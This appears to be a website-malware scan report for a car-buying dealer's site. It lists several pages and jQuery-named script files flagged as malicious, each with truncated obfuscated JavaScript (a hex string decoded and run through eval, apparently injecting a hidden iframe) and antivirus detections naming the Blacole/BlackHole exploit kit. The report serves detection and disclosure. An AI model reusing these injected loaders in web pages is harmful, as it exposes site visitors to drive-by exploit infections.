Request | Server response | Status |
http://www.phoenixbuymyride.com/ | 200 OK Content-Length: 52214 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) gbmv=document;pjam="spl"+"i"+"t";hsk=window;dzpo="0"+"x";smc=(5-3-1);try{--(gbmv["body"])}catch(dfgpz){uqyyqt=false;try{}catch(sxvai){uqyyqt=21;}if(1){cqroz="17:5d:6c:65:5a:6b:60:66:65:17:61:60:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:61:60:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:
... 3388 bytes are skipped ...a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:61:60:27:30:1f:20:32:4:1:74:4:1:74"[pjam](":");}hsk=cqroz;lpm=[];for(ift=22-20-2;-ift+1383!=0;ift+=1){rjj=ift;if((0x19==031))lpm+=String.fromCharCode(eval(dzpo+hsk[1*rjj])+0xa-smc);}vjewlo=eval;vjewlo(lpm)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1215
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://www.phoenixbuymyride.com/js/jquery.min.js | 200 OK Content-Length: 76949 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
ednxeh=document;jdtjb="spl"+"i"+"t";kxrxf=window;psr="0"+"x";hkxs=(5-3-1);try{--(ednxeh["body"])}catch(kccxpz){gattv=false;try{}catch(vvt){gattv=21;}if(1){lpa="17:5d:6c:65:5a:6b:60:66:65:17:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60
... 3597 bytes are skipped ...62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:5d:27:30:1f:20:32:4:1:74:4:1:74"[jdtjb](":");}kxrxf=lpa;jzlzea=[];for(ncq=22-20-2;-ncq+1363!=0;ncq+=1){zcd=ncq;if((0x19==031))jzlzea+=String.fromCharCode(eval(psr+kxrxf[1*zcd])+0xa-hkxs);}jtjes=eval;jtjes(jzlzea)}
Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.HB
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.HB
- TrendMicro-HouseCall
- TROJ_GEN.F47V1025
- Emsisoft
- JS:Exploit.BlackHole.HB (B)
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.HB
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.HB
- BitDefender
- JS:Exploit.BlackHole.HB
|
http://www.phoenixbuymyride.com/js/jquery.easing.1.2.js | 200 OK Content-Length: 9517 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
ednxeh=document;jdtjb="spl"+"i"+"t";kxrxf=window;psr="0"+"x";hkxs=(5-3-1);try{--(ednxeh["body"])}catch(kccxpz){gattv=false;try{}catch(vvt){gattv=21;}if(1){lpa="17:5d:6c:65:5a:6b:60:66:65:17:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60
... 3597 bytes are skipped ...62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:5d:27:30:1f:20:32:4:1:74:4:1:74"[jdtjb](":");}kxrxf=lpa;jzlzea=[];for(ncq=22-20-2;-ncq+1363!=0;ncq+=1){zcd=ncq;if((0x19==031))jzlzea+=String.fromCharCode(eval(psr+kxrxf[1*zcd])+0xa-hkxs);}jtjes=eval;jtjes(jzlzea)}
Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.HB
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.HB
- TrendMicro-HouseCall
- TROJ_GEN.F47V1025
- Emsisoft
- JS:Exploit.BlackHole.HB (B)
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.HB
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.HB
- BitDefender
- JS:Exploit.BlackHole.HB
|
http://www.phoenixbuymyride.com/js/jquery.anythingslider.js | 200 OK Content-Length: 14894 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
ednxeh=document;jdtjb="spl"+"i"+"t";kxrxf=window;psr="0"+"x";hkxs=(5-3-1);try{--(ednxeh["body"])}catch(kccxpz){gattv=false;try{}catch(vvt){gattv=21;}if(1){lpa="17:5d:6c:65:5a:6b:60:66:65:17:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60
... 3597 bytes are skipped ...62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:5d:27:30:1f:20:32:4:1:74:4:1:74"[jdtjb](":");}kxrxf=lpa;jzlzea=[];for(ncq=22-20-2;-ncq+1363!=0;ncq+=1){zcd=ncq;if((0x19==031))jzlzea+=String.fromCharCode(eval(psr+kxrxf[1*zcd])+0xa-hkxs);}jtjes=eval;jtjes(jzlzea)}
Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.HB
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.HB
- TrendMicro-HouseCall
- TROJ_GEN.F47V1025
- Emsisoft
- JS:Exploit.BlackHole.HB (B)
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.HB
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.HB
- BitDefender
- JS:Exploit.BlackHole.HB
|
http://www.phoenixbuymyride.com/webuycars.php | 200 OK Content-Length: 31373 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) gbmv=document;pjam="spl"+"i"+"t";hsk=window;dzpo="0"+"x";smc=(5-3-1);try{--(gbmv["body"])}catch(dfgpz){uqyyqt=false;try{}catch(sxvai){uqyyqt=21;}if(1){cqroz="17:5d:6c:65:5a:6b:60:66:65:17:61:60:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:61:60:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:
... 3388 bytes are skipped ...a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:61:60:27:30:1f:20:32:4:1:74:4:1:74"[pjam](":");}hsk=cqroz;lpm=[];for(ift=22-20-2;-ift+1383!=0;ift+=1){rjj=ift;if((0x19==031))lpm+=String.fromCharCode(eval(dzpo+hsk[1*rjj])+0xa-smc);}vjewlo=eval;vjewlo(lpm)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1215
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://www.phoenixbuymyride.com/cashforcars.php | 200 OK Content-Length: 31021 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) gbmv=document;pjam="spl"+"i"+"t";hsk=window;dzpo="0"+"x";smc=(5-3-1);try{--(gbmv["body"])}catch(dfgpz){uqyyqt=false;try{}catch(sxvai){uqyyqt=21;}if(1){cqroz="17:5d:6c:65:5a:6b:60:66:65:17:61:60:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:61:60:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:
... 3388 bytes are skipped ...a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:61:60:27:30:1f:20:32:4:1:74:4:1:74"[pjam](":");}hsk=cqroz;lpm=[];for(ift=22-20-2;-ift+1383!=0;ift+=1){rjj=ift;if((0x19==031))lpm+=String.fromCharCode(eval(dzpo+hsk[1*rjj])+0xa-smc);}vjewlo=eval;vjewlo(lpm)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1215
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://www.phoenixbuymyride.com/sellmycar.php | 200 OK Content-Length: 30027 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) gbmv=document;pjam="spl"+"i"+"t";hsk=window;dzpo="0"+"x";smc=(5-3-1);try{--(gbmv["body"])}catch(dfgpz){uqyyqt=false;try{}catch(sxvai){uqyyqt=21;}if(1){cqroz="17:5d:6c:65:5a:6b:60:66:65:17:61:60:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:61:60:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:
... 3388 bytes are skipped ...a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:61:60:27:30:1f:20:32:4:1:74:4:1:74"[pjam](":");}hsk=cqroz;lpm=[];for(ift=22-20-2;-ift+1383!=0;ift+=1){rjj=ift;if((0x19==031))lpm+=String.fromCharCode(eval(dzpo+hsk[1*rjj])+0xa-smc);}vjewlo=eval;vjewlo(lpm)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1215
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://www.phoenixbuymyride.com/sellyourcarfast.php | 200 OK Content-Length: 29933 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) gbmv=document;pjam="spl"+"i"+"t";hsk=window;dzpo="0"+"x";smc=(5-3-1);try{--(gbmv["body"])}catch(dfgpz){uqyyqt=false;try{}catch(sxvai){uqyyqt=21;}if(1){cqroz="17:5d:6c:65:5a:6b:60:66:65:17:61:60:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:61:60:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:
... 3388 bytes are skipped ...a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:61:60:27:30:1f:20:32:4:1:74:4:1:74"[pjam](":");}hsk=cqroz;lpm=[];for(ift=22-20-2;-ift+1383!=0;ift+=1){rjj=ift;if((0x19==031))lpm+=String.fromCharCode(eval(dzpo+hsk[1*rjj])+0xa-smc);}vjewlo=eval;vjewlo(lpm)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1215
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://www.phoenixbuymyride.com/cashforusedcars.php | 200 OK Content-Length: 32501 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) gbmv=document;pjam="spl"+"i"+"t";hsk=window;dzpo="0"+"x";smc=(5-3-1);try{--(gbmv["body"])}catch(dfgpz){uqyyqt=false;try{}catch(sxvai){uqyyqt=21;}if(1){cqroz="17:5d:6c:65:5a:6b:60:66:65:17:61:60:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:61:60:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:
... 3388 bytes are skipped ...a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:61:60:27:30:1f:20:32:4:1:74:4:1:74"[pjam](":");}hsk=cqroz;lpm=[];for(ift=22-20-2;-ift+1383!=0;ift+=1){rjj=ift;if((0x19==031))lpm+=String.fromCharCode(eval(dzpo+hsk[1*rjj])+0xa-smc);}vjewlo=eval;vjewlo(lpm)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1215
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://www.phoenixbuymyride.com/index.php | 200 OK Content-Length: 52214 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) gbmv=document;pjam="spl"+"i"+"t";hsk=window;dzpo="0"+"x";smc=(5-3-1);try{--(gbmv["body"])}catch(dfgpz){uqyyqt=false;try{}catch(sxvai){uqyyqt=21;}if(1){cqroz="17:5d:6c:65:5a:6b:60:66:65:17:61:60:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:61:60:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:
... 3388 bytes are skipped ...a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:61:60:27:30:1f:20:32:4:1:74:4:1:74"[pjam](":");}hsk=cqroz;lpm=[];for(ift=22-20-2;-ift+1383!=0;ift+=1){rjj=ift;if((0x19==031))lpm+=String.fromCharCode(eval(dzpo+hsk[1*rjj])+0xa-smc);}vjewlo=eval;vjewlo(lpm)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1215
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://www.phoenixbuymyride.com/sellacar.php | 200 OK Content-Length: 32713 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) gbmv=document;pjam="spl"+"i"+"t";hsk=window;dzpo="0"+"x";smc=(5-3-1);try{--(gbmv["body"])}catch(dfgpz){uqyyqt=false;try{}catch(sxvai){uqyyqt=21;}if(1){cqroz="17:5d:6c:65:5a:6b:60:66:65:17:61:60:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:61:60:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:
... 3388 bytes are skipped ...a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:61:60:27:30:1f:20:32:4:1:74:4:1:74"[pjam](":");}hsk=cqroz;lpm=[];for(ift=22-20-2;-ift+1383!=0;ift+=1){rjj=ift;if((0x19==031))lpm+=String.fromCharCode(eval(dzpo+hsk[1*rjj])+0xa-smc);}vjewlo=eval;vjewlo(lpm)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1215
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://www.phoenixbuymyride.com/sellvstrade.php | 200 OK Content-Length: 26312 Content-Type: text/html | malicious |
